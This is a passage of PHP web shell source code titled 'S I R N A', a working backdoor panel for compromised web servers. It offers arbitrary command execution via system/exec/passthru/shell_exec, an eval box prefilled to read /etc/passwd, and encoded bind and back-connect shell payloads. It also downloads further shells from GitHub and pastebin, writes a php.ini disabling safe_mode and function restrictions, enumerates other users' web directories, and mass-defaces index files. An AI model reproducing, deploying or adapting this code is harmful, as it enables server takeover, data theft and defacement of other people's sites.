- $buff .= "<tr><td><a id=\"" . clearspace($file) . "_link\" href=\"?sad=$pwd&view=$full\"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII=' /> $file</a>
- <form action=\"?sad=$pwd\" method=\"post\" id=\"" . clearspace($file) . "_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
- <input type=\"hidden\" name=\"oldname\" value=\"" . $file . "\" style=\"margin:0;padding:0;\" />
- <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"" . $file . "\" />
- <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
- <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('" . clearspace($file) . "_link','" . clearspace($file) . "_form');\" />
- </form></td><td>" . ukuran($full) . "</td><td style=\"text-align:center;\">" . $owner . "</td><td><center>
- <a href=\"javascript:tukar('" . clearspace($file) . "_link','" . clearspace($file) . "_form2');\">" . get_perms($full) . "</a>
- <form action=\"?sad=$pwd\" method=\"post\" id=\"" . clearspace($file) . "_form2\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
- <input type=\"hidden\" name=\"name\" value=\"" . $file . "\" style=\"margin:0;padding:0;\" />
- <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"" . substr(sprintf('%o', fileperms($full)), -4) . "\" />
- <input class=\"inputzbut\" type=\"submit\" name=\"chmod\" value=\"chmod\" />
- <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('" . clearspace($file) . "_link','" . clearspace($file) . "_form2');\" /></form></center></td>
- <td style=\"text-align:center;\">" . date("d-M-Y H:i", @filemtime($full)) . "</td>
- <td><a href=\"?sad=$pwd&edit=$full\">edit</a> | <a href=\"javascript:tukar('" . clearspace($file) . "_link','" . clearspace($file) . "_form');\">rename</a>| <a href=\"?sad=$pwd&delete=$full\">delete</a> | <a href=\"?sad=$pwd&dl=$full\">download</a> (<a href=\"?sad=$pwd&dlgzip=$full\">gz</a>)
- </td></tr>";
- }
- $buff .= "<center><tr style='background-color:teal;'><td colspan='6'><center>Kau Buat Sirna Sudahlah.. Harapanku Hidup Bersamamu..</center></td></table>";
- return $buff;
- }
- function ukuran($file)
- {
- if ($size = @filesize($file)) {
- if ($size <= 1024)
- return $size;
- else {
- if ($size <= 1024 * 1024) {
- $size = @round($size / 1024, 2);
- ;
- return "$size kb";
- } else {
- $size = @round($size / 1024 / 1024, 2);
- return "$size mb";
- }
- }
- } else
- return "???";
- }
- function exe($cmd)
- {
- if (function_exists('system')) {
- @ob_start();
- @system($cmd);
- $buff = @ob_get_contents();
- $buff = @ob_get_contents();
- @
- return $buff;
- } elseif (function_exists('exec')) {
- @exec($cmd, $results);
- $buff = "";
- foreach ($results as $result) {
- $buff .= $result;
- }
- return $buff;
- } elseif (function_exists('passthru')) {
- @ob_start();
- @passthru($cmd);
- $buff = @ob_get_contents();
- @
- return $buff;
- } elseif (function_exists('shell_exec')) {
- $buff = @shell_exec($cmd);
- return $buff;
- }
- }
- function tulis($file, $text)
- {
- $textz = gzinflate(base64_decode($text));
- if ($filez = @fopen($file, "w")) {
- @fputs($filez, $textz);
- @fclose($file);
- }
- }
- function ambil($link, $file)
- {
- if ($fp = @fopen($link, "r")) {
- while (!feof($fp)) {
- $cont .= @fread($fp, 1024);
- }
- @fclose($fp);
- $fp2 = @fopen($file, "w");
- @fwrite($fp2, $cont);
- @fclose($fp2);
- }
- }
- function which($pr)
- {
- $path = exe("which $pr");
- if (!empty($path)) {
- return trim($path);
- } else {
- return trim($pr);
- }
- }
- function download($cmd, $url)
- {
- $namafile = basename($url);
- switch ($cmd) {
- case 'wwget':
- exe(which('wget') . " " . $url . " -O " . $namafile);
- break;
- case 'wlynx':
- exe(which('lynx') . " -source " . $url . " > " . $namafile);
- break;
- case 'wfread':
- ambil($wurl, $namafile);
- break;
- case 'wfetch':
- exe(which('fetch') . " -o " . $namafile . " -p " . $url);
- break;
- case 'wlinks':
- exe(which('links') . " -source " . $url . " > " . $namafile);
- break;
- case 'wget':
- exe(which('GET') . " " . $url . " > " . $namafile);
- break;
- case 'wcurl':
- exe(which('curl') . " " . $url . " -o " . $namafile);
- break;
- default:
- break;
- }
- return $namafile;
- }
- function get_perms($file)
- {
- if ($mode = @fileperms($file)) {
- $perms = '';
- $perms .= ($mode & 00400) ? 'r' : '-';
- $perms .= ($mode & 00200) ? 'w' : '-';
- $perms .= ($mode & 00100) ? 'x' : '-';
- $perms .= ($mode & 00040) ? 'r' : '-';
- $perms .= ($mode & 00020) ? 'w' : '-';
- $perms .= ($mode & 00010) ? 'x' : '-';
- $perms .= ($mode & 00004) ? 'r' : '-';
- $perms .= ($mode & 00002) ? 'w' : '-';
- $perms .= ($mode & 00001) ? 'x' : '-';
- return $perms;
- } else
- return "??????????";
- }
- function clearspace($text)
- {
- return str_replace(" ", "_", $text);
- }
- $tunisia = '';
- $port_bind_bd_c = "bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6 uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf";
- $port_bind_bd_pl = "ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8=";
- $back_connect = "fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw==";
- $back_connect_c = "XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw==";<html><head><link rel="icon" type="image/png" href="http://downloadicons.net/sites/default/files/heartbreak-icon-85786.png"><title>S I R N A</title>
- <script type="text/javascript">function tukar(b,a){document.getElementById(b).style.display="none";document.getElementById(a).style.display="block"};</script>
- <link href="https://fonts.googleapis.com/css?family=Montserrat" rel="stylesheet">
- <style>body::-webkit-scrollbar{width:1em}body::-webkit-scrollbar-track{-webkit-box-shadow:inset 0 0 6px rgba(0,0,0,.3)}body::-webkit-scrollbar-thumb{background-color:darkgrey;outline:1px solid slategrey}.mybox{-moz-border-radius:10px;border-radius:10px;border:1px solid #4c83af;padding:4px 2px;width:70%;line-height:24px}.myboxtbl{width:50%}body{background-color:transparan;background:#000;background-image:url("echo $background;");background-position:center;background-attachment:fixed;background-repeat:no-repeat}a{text-decoration:none}hr,a:hover{border-bottom:1px solid #4c83af}*{text-shadow:0 0 .3em #999;font-size:14px;font-family:'Montserrat',sans-serif;color:echo $fontcolor_global;}.tabnet{margin:15px auto 0 auto;border:1px solid #333}.main{width:100%}.gaya{color:#888}.top{border-left:1px solid black;border-RIGHT:1px solid #fff;font-family:verdana}input{background:#111;border:1;padding:2px;border-bottom:1px solid #222;border-top:1px solid #222;font-size:12px;vertical-align:middle;height:20;border-left:1px solid #5d5d5d;border-right:1px solid #121212;border-bottom:1px solid #121212;border-top:1px solid #5d5d5d;color:#9f9f9f}.inputz{background:#111;border:0;padding:2px;border-bottom:1px solid #393939;font-size:11px;color:#fff;-moz-border-radius:6px;border-radius:10px;border:1px solid #4c83af;margin:4px 0 8px 0}.inputzbut{background:#111;color:#8f8f8f;margin:0 4px;border:1px solid #444}.inputzbut:hover{border-bottom:1px solid #4c83af;border-top:1px solid #4c83af}.inputz:hover{-moz-border-radius:6px;border-radius:10px;border:1px solid #4c83af;margin:4px 0 8px 0;border-bottom:1px solid #4c83af;border-top:1px solid #4c83af}.output2{margin:auto;border:1px solid #888;background:#000;padding:0 2px}textarea{margin:auto;border:2px solid #555;background:#000;padding:0 2px}.output{margin:auto;border:1px solid #303030;width:100%;height:400px;background:#000;padding:0 2px}.cmdbox{width:100%}.head_info{padding:0 4px}.b1{font-size:30px;padding:0;color:#555}.b2{font-size:30px;padding:0;color:maroon}.b_tbl{text-align:center;margin:0 4px 0 0;padding:0 4px 0 0;border-right:1px solid #333}.phpinfo table{width:100%;padding:0}.phpinfo td{background:#111;color:#ccc;padding:6px 8px}.phpinfo th,th{background:teal;border-bottom:1px solid #333;font-weight:400}.phpinfo h2,.phpinfo h2 a{text-align:center;font-size:16px;padding:0;margin:30px 0 0 0;background:#222;padding:4px 0}.explore{width:100%}.explore a{text-decoration:none}.explore td{border-bottom:1px solid #333;padding:0 8px;line-height:24px;color:#999}.explore th{padding:3px 8px;font-weight:400;color:white}.explore th:hover,.phpinfo th:hover{border-bottom:1px solid red}.explore tr:hover{background:#333}.viewfile{background:#edeceb;color:#000;margin:4px 2px;padding:8px}.sembunyi{display:none;padding:0;margin:0}#menu{background:#111;font-family:'Montserrat',sans-serif;font-size:12px;color:silver}#menu a{font-family:'Montserrat',sans-serif;padding:3px 5px;margin:2;text-shadow:0 0 .1em rgba(0,128,128,1),0pt 0 .3em rgba(0,128,128,1);background:#2d2b2b;text-decoration:none;letter-spacing:2px;display:inline-block;-moz-border-radius:10px;-webkit-border-radius:5px;-khtml-border-radius:5px;border-radius:5px}#menu a:hover{font-family:'Montserrat',sans-serif;background:#191919;border-bottom:1px solid #444;border-top:1px solid #444;color:#cecece}li{display:inline-block}ul{list-style-type:none;margin:0;margin:0}k,k a,k a:hover{text-shadow:0 0 .3em red;font-family:'Montserrat',sans-serif;font-size:25px;color:#fff}h7{font-size:35px}</style><body onLoad="document.getElementById('cmd').focus()"><div class="main"><div class="head_info"> <table><tr><td width="15%"><table class="b_tbl" cellspacing="0">
- echo '<center><img src="http://cdn2.tstatic.net/tribunnews/foto/bank/images/20140203_070700_ilustrasi-galau.jpg" width="150px"><br><b>'.(base64_decode('UyBJIFIgTiBB==').'</b>');<div id="menu"><a href="?echo "sad=" . $pwd;&x=about">About Me</a></div></center>
- </td></tr></table></td><td class="top" width='80%' valign="top">echo $buff;</td><td style="width:30%" valign="top"><a>server ip :echo $server_ip . "<font color='red'><br><br></font> your ip : " . $my_ip . "<br></a>";</td></tr></table></div>
- <div id="menu">
- <center>
- <ul>
- <li><a href="?"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAAN1gAADdYBkG95nAAAAAd0SU1FB9oJBxQ2GRnu/TgAAAJzSURBVDjLtZLPSxtBHMXf5semZDfS7KpIaWzRShoFD5UK9h6ai5eCPfZkwYJ4kF566a30H0gF24BUqDdjBT1VCFIsNBUWEw+ha2obpDGUXGR1Z7KZ+fbQRky1vfULAzPD4/MeMw/4H7O6ugoAsG17tFwuJwFgd3f3Qq3yN0g+n7+r6/oKgEtQMDWYGHx5kc539rC4uAgA2Hy/OaGq6oplWaVcLmdxxl9YlvUEALa2tv6dYGPjXSoS6chWKpWKaZpdoVBIL5VK+0NDQ/1END02NjZ/LsHc3BwAYG1tbSIYVLOFQuGzpmldgUDAkFKqvb2917a3t23GWDqXyz0BgPX19fYEy8vLKV3XswcHBxXDMLoikYghpaRW0kajwfbK5W834/F+ANOpVGr+FLC0tHRf0/TX+/tf7J6eniuappkA6IwBtSC2bX9NJBIDRPT05OTkuTL1aKpj9Pbox1qtdmgYxlXTNG8QEV3wPgRAcV23bllWfmRkZNh13VuKpmnBvr6+O1LK2szMzNtwOBxviYUQUBQFPp+vBYCU8jCTyaSOj48vA/hw6jI+Ph5JJpOfwuFwnIjAGKsvLCw8cxxHTE4+fGwY0RgRgYi+O44zPDs7W2/rgeu6CmMMjDFwziGE+JFIJF5Vq9VMs+kdcs7BOQdjDEdHR6fGgdZGCAHOOfx+P4gIQggZjUaps9OkRqNBjDHQr1E8z8M5QLVaheM4TZ/fBxDQbDZVz/MgJYFzHlRVFURQms2GqNfr4qIm+mOx2L3u7u5hKSVCIXVPSvGmsFNUBuLxB8FA4DoAeJ63UywWswBk2x+l0+kW0P97KX80tnXfNj8B5NE5DOMV2T0AAAAASUVORK5CYII='></a></li>
- <li><a href="?echo "sad=" . $pwd;">Files</a></li>
- <li><a href="?echo "sad=" . $pwd;&x=shell">Command</a></li>
- <li><a href="?echo "sad=" . $pwd;&x=upload">Upload</a></li>
- <li><a href="?echo "sad=" . $pwd;&x=php">Eval</a></li>
- <li><a href="?echo "sad=" . $pwd;&x=sym">Sym</a></li>
- <li><a href="?echo "sad=" . $pwd;&x=jumping">Jumping</a></li>
- <li><a href="?echo "sad=" . $pwd;&x=hostg">Fucking HostGator</a></li>
- <li><a href="?echo "sad=" . $pwd;&x=grabc">Config Grabber</a></li>
- <li><a href="?echo "sad=" . $pwd;&x=netsploit">Tools</a></li>
- <li><a href="?echo "sad=" . $pwd;&x=mass">Mass</a></li>
- <li><a href="?echo "sad=" . $pwd;&x=krdp">Create RDP</a></li>
- <li><a href="?echo "sad=" . $pwd;&x=mailtest">Mail Tester</a></li>
- <li><a href="?echo "sad=" . $pwd;&x=get_tools">Write Tools</a></li>
- <li><a href="?echo "sad=" . $pwd;&x=bypasser">Bypasser</a></li>
- <li><a href="?echo "sad=" . $pwd;&x=brute">Brute</a></li>
- <li><a href="?echo "sad=" . $pwd;&x=phpinfo">phpinfo</a></li>
- <li><a href="?echo "sad=" . $pwd;&x=zone-h">Zone-H</a></li>
- <li><a href="?echo "sad=" . $pwd;&x=joomla">Joomla</a></li>
- <li><a href="?echo "sad=" . $pwd;&x=wordpress">Wordpress</a></li>
- <li><a href="?echo "sad=" . $pwd;&x=vb">Vb</a></li>
- <li><a href="?echo "sad=" . $pwd;&x=domains">Domains</a></li>
- <li><a href="?echo "sad=" . $pwd;&x=string">String</a></li>
- <li><a href="?echo "sad=" . $pwd;&x=cmsdet">CMS Detector</a></li>
- <li><a href="?echo "sad=" . $pwd;&x=wm">Wp Mass</a></li>
- <li><a href="?echo "sad=" . $pwd;&x=settings">Settings</a></li>
- <li><a href="?echo "sad=" . $pwd;&x=change_pass">Change Shell Password</a></li>
- <li><a href="?logout" style="background:#900;color:#FFF;background-image:url('http://up.ashiyane.org/images/b5crr7rhrwc5e97nvgxq.png');background-position:2px;height:20px;width:100px;background-repeat:no-repeat">Logout</a></li>
- </ul>
- </center>
- </div>
- if (isset($_GET['x']) && ($_GET['x'] == 'php')) {<form action="?sad=echo $pwd;&x=php" method="post"><table class="cmdbox"><tr><td><textarea class="output" name="cmd" id="cmd" cols=90>
- if (isset($_POST['submitcmd'])) {
- echo eval(magicboom($_POST['cmd']));
- } else
- echo "echo file_get_contents('/etc/passwd');";</textarea></td></tr><tr><td><input style="width:19%" class="inputzbut" type="submit" value="Do !" name="submitcmd" /></td></tr></form></table></form>
- }
- elseif (isset($_GET['logout'])) {
- session_unset($_SESSION["login"]);
- echo '<meta http-equiv="Refresh" content="0; URL='.$_SERVER['PHP_SELF'].'"/>';
- }
- elseif (isset($_GET['x']) && ($_GET['x'] == 'change_pass')) {
- <center>
- <h1>Change Shell Password</h1>
- <form action="?sad=echo $pwd;&x=change_pass" method="post">
- <input type="text" name="password" class="inputz"><br>
- <input type="submit" name="submit" class="inputzbut">
- </form>
- if(isset($_POST['submit'])){
- $newpassword = md5($_POST['password']);
- $old_pass = '"'.$auth_pass.'";';
- $new_pass = '"'.$newpassword.'";';
- if(file_get_contents($_SERVER['SCRIPT_FILENAME'])){
- $kr_pass = file_get_contents($_SERVER['SCRIPT_FILENAME']);
- $kr_pass = preg_replace("/$old_pass/is",$new_pass,$kr_pass);
- if(file_put_contents($_SERVER['SCRIPT_FILENAME'], $kr_pass)){
- echo "password baru : <font color=red>".$_POST['password']."</font> - <font color=greenyellow>$newpassword</font>";
- }
- }else{
- echo "Password gagal";
- }
- }
- }
- elseif(isset($_GET['x']) && ($_GET['x'] == 'mailtest'))
- {
- $to = 'htaccess12@gmail.com';
- $subject = 'Support Mailer ^_^';
- $message = 'Support Mailer ! ^_^';
- $headers = 'From: webmaster@example.com\r\nReply-To: webmaster@example.com\r\nX-Mailer: PHP/' . phpversion();
- mail($to, $subject, $message, $headers);
- if(mail($to, $subject, $message, $headers)){
- echo '<script>alert("Support Mailer !!! Cek Emailmu !")</script>';
- }else{
- echo '<script>alert("Ada Kesalahan ! ")</script>';
- }
- }
- elseif(isset($_GET['x']) && ($_GET['x'] == 'settings'))
- {
- <center><br>
- <h7>Settings Shell</h7><br>
- <a href="?echo "y=".$pwd;&x=set_bg"><input class=inputzbut type=submit value=" Background Shell" /></a>
- | <a href="?echo "y=".$pwd;&x=set_login"><input class=inputzbut type=submit value=" Login Background" /></a><br>
- </center>
- //functions settings
- $bgshell = $_POST['bg_shell'];
- $bg_login = $_POST['bg_login'];
- if(isset($_POST['submit'])){
- if (!empty($bgshell)) {
- $bgshelll = $_POST['bg_shell'];
- $replace_new = ''.$bgshelll.'';
- if(file_get_contents($_SERVER['SCRIPT_FILENAME'])){
- $write = file_get_contents($_SERVER['SCRIPT_FILENAME']);
- $background = preg_quote($background, '/');
- var_dump($background);
- $write = preg_replace("/$background/",$replace_new,$write);
- if(file_put_contents($_SERVER['SCRIPT_FILENAME'], $write)){
- echo '<center>Setting Saved !</center>';
- }
- }else{
- echo "<center>Setting Not Saved</center>";
- }
- }elseif(!empty($bg_login)){
- $bglogin = $_POST['bg_login'];
- $replace_new = ''.$bglogin.'';
- if(file_get_contents($_SERVER['SCRIPT_FILENAME'])){
- $write = file_get_contents($_SERVER['SCRIPT_FILENAME']);
- $background_login = preg_quote($background_login, '/');
- $write = preg_replace("/$background_login/",$replace_new,$write);
- if(file_put_contents($_SERVER['SCRIPT_FILENAME'], $write)){
- echo '<center>Setting Saved !</center>';
- }
- }else{
- echo "<center>Setting Not Saved !</center>";
- }
- }
- }
- }
- elseif(isset($_GET['x']) && ($_GET['x'] == 'get_tools'))
- {<center><br><br><h3>Write Tools</h3>
- <table>
- <tr><form method="post" action=""> <td>
- <select class="inputz" align="left" name="pilihan" id="pilih">
- <option value="hsphere">Bypass hSphere Shell</option>
- <option value="adminer">Adminer</option>
- <option value="miniadmin">PHPMiniAdmin</option>
- <option value="wso">WSO Shell</option>
- </select>
- <input type="submit" name="submites" class="inputz" value="create">
- </td></form></tr></table><br/><br/><br/>
- function gettool($filename,$link){
- $get = file_get_contents($link);
- file_put_contents($filename.'.php', $get);
- echo '<script>alert("Done ! ");</script>';
- echo 'Berhasil => <a href="'.$filename.'.php" target="_blank">'.$filename.'.php</a>';
- }
- $submit = $_POST ['submites'];
- if(isset($submit)) {
- $pilih = $_POST['pilihan'];
- ///hsphere shell
- if ( $pilih == 'hsphere') {
- gettool("hsphere","https://raw.githubusercontent.com/sinkaroid/pasirmerah/sc0/sc0hsphere.php");
- }
- elseif ( $pilih == 'adminer') {
- gettool("adminer","https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php");
- }elseif($pilih == 'miniadmin'){
- gettool("sqlminiadmin","https://pastebin.com/raw/iHSNkKmg");
- }elseif( $pilih == 'wso'){
- gettool("wso","https://raw.githubusercontent.com/tennc/webshell/master/php/wso/WSO_base64.php");
- }
- }
- }
- elseif(isset($_GET['x']) && ($_GET['x'] == 'set_bg'))
- {
- <center>
- <form action="?sad=echo $pwd;&x=settings" method="POST">
- <table>
- <tr>
- <td><h7>Appearance Setting</h7></td>
- </tr>
- <tr>
- <td>Background Shell</td><td>:</td><td><input type="text" name="bg_shell" class="inputz" placeholder="link image" style="width:200px"></td>
- </tr>
- <tr>
- <td></td><td></td><td><input type="submit" name="submit" class="inputzbut"></td>
- </tr>
- </form>
- </table>
- }
- elseif(isset($_GET['x']) && ($_GET['x'] == 'set_login'))
- {
- <center>
- <form action="?sad=echo $pwd;&x=settings" method="POST">
- <table>
- <tr>
- <td><h7>Appearance Setting</h7></td>
- </tr>
- <tr>
- <td>Login Background</td><td>:</td><td><input type="text" name="bg_login" class="inputz" placeholder="link image" style="width:200px"></td>
- </tr>
- <tr>
- <td></td><td></td><td><input type="submit" name="submit" class="inputzbut" value="submit setting"></td>
- </tr>
- </form>
- </table>
- }
- elseif(isset($_GET['x']) && ($_GET['x'] == 'bypasser'))
- {
- echo "<center><br/><br/>Choose Bypasser Below<br/><br/>";
- <a href="?echo "path=".$path;&x=bysysfuncwsf"><input class=bordergaya type=submit value="Bypass Root Path With System Function" /></a>
- Or <a href="?echo "path=".$path;&x=bypsini"><input class=bordergaya type=submit value="Bypass Disable Functions" /></a>
- Or <a href="?echo "path=".$path;&x=bysysfuncwexec"><input class=bordergaya type=submit value="Bypass Root Path With Exec Function" /></a>
- <br/><br/><br/><br/>
- }
- ////////////////////////////////////////
- ///////////////////////////////////////
- elseif(isset($_GET['x']) && ($_GET['x'] == 'bysysfuncwsf')) {
- echo '<br><center><span style="font-size:20px;">Bypass Root Path With System Function</span><center>';
- mkdir('bysyswsf', 0755);
- chdir('bysyswsf');
- $bysyswsf = file_get_contents("https://pastebin.com/raw/Pw07PwVD");
- $file = fopen("bysyswsf.php" ,"w+");
- $write = fwrite ($file ,$bysyswsf);
- fclose($file);
- chmod("bysyswsf.php",0755);
- echo "<iframe src=bysyswsf/bysyswsf.php width=70% height=70% frameborder=0></iframe>";
- }
- ////////////////////////////////////////
- ////////////////////////////////////////
- elseif(isset($_GET['x']) && ($_GET['x'] == 'bypsini')) {
- $byht = "safe_mode = Off
- disable_functions = None
- safe_mode_gid = OFF
- open_basedir = OFF
- allow_url_fopen = On";
- file_put_contents("php.ini",$byht);
- echo "<script>alert('Congrats!'); hideAll();</script>";
- die('<meta http-equiv="refresh" content="0; url=?" />');
- }
- ////////////////////////////////////////
- ///////////////////////////////////////
- elseif(isset($_GET['x']) && ($_GET['x'] == 'bysysfuncwexec')) {
- echo '<br><center><span style="font-size:20px;">Bypass Root Path With Exec Function</span><center>';
- mkdir('bysyswexecf', 0755);
- chdir('bysyswexecf');
- $bysyswsf = file_get_contents("https://pastebin.com/raw/6ccPfLW6");
- $file = fopen("bysyswexecf.php" ,"w+");
- $write = fwrite ($file ,$bysyswsf);
- fclose($file);
- chmod("bysyswexecf.php",0755);
- echo "<iframe src=bysyswexecf/bysyswexecf.php width=70% height=70% frameborder=0></iframe>";
- }
- ////////////////////////////////////////
- ////////////////////////////////////////
- ///////////////////////////////////////////////////////////////////////////
- ///////////JUMPING////////////////////////////////////////////////////////
- //////////////////////////////////////////
- elseif (isset($_GET['x']) && ($_GET['x'] == 'jumping')) {
- <center>
- <form action="?sad=echo $pwd;&x=jumping" method="post">
- //radable public_html
- ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
- set_time_limit(0);
- ###################
- @$passwd = fopen('/etc/passwd','r');
- if (!$passwd) { die('<br>[-] Error : coudn`t read /etc/passwd'); }
- $pub = array();
- $users = array();
- $conf = array();
- $i = 0;
- while(!feof($passwd))
- {
- $str = fgets($passwd);
- if ($i > 35)
- {
- $pos = strpos($str,':');
- $username = substr($str,0,$pos);
- $dirz = '/home/'.$username.'/public_html/';
- if (($username != ''))
- {
- if (is_readable($dirz))
- {
- array_push($users,$username);
- array_push($pub,$dirz);
- }
- }
- }
- $i++;
- }
- ###################
- echo '<br><br></center></center>';
- echo "<font class='rapihbanget'>[+] Founded ".sizeof($users)." entrys in /etc/passwd\n<br /></font>";
- echo "<font class='rapihbanget'>[+] Founded ".sizeof($pub)." readable public_html directories\n<br /></font>";
- echo "<font class='rapihbanget'>[~] Searching for passwords in config files...<br /><br /></font>";
- foreach ($users as $user)
- {
- $path = "/home/$user/public_html/";
- echo "<font class='rapihbanget'><a href='?sad=$path' target='_blank' font-weight:bold; color:#F80;'>$path</a><br></font>";
- }
- echo "<br /><font class='rapihbanget'>[+] Complete...\n<br /></font>";
- echo "<font class='rapihbanget'>[+] Monggo Sikat Boz!\n<br /></font>";
- echo '<br><br></b></body><center>';
- }
- ///////////////
- elseif (isset($_GET['x']) && ($_GET['x'] == 'mass')) {
- error_reporting(0);<center><table><td width="50%"><form ENCTYPE="multipart/form-data" action="$_SERVER['PHP_SELF'];" method=post><p align="center"><h2>Folder</h2><input class='inputz' typ=text name=path size=60 value="echo getcwd();"><br><h2>file name</h2><input class='inputz' typ=text name=file size=60 value="index.php"><br></td><td width="50%"><h3>Script Defacemu </h3><textarea class='inputz' name=index rows=10 cols=40>Hacked By NoNameUser - Error Violence</textarea><br></td></p></table><center><br><br><br><input class='inputzbut' type=submit value=" Deface "></center></form><br>$mainpath = $_POST[path];
- $file = $_POST[file];
- $dir = opendir("$mainpath");
- $code = base64_encode($_POST[index]);
- $indx = base64_decode($code);
- while ($row = readdir($dir)) {
- $start = @fopen("$row/$file", "w+");
- $finish = @fwrite($start, $indx);
- if ($finish) {
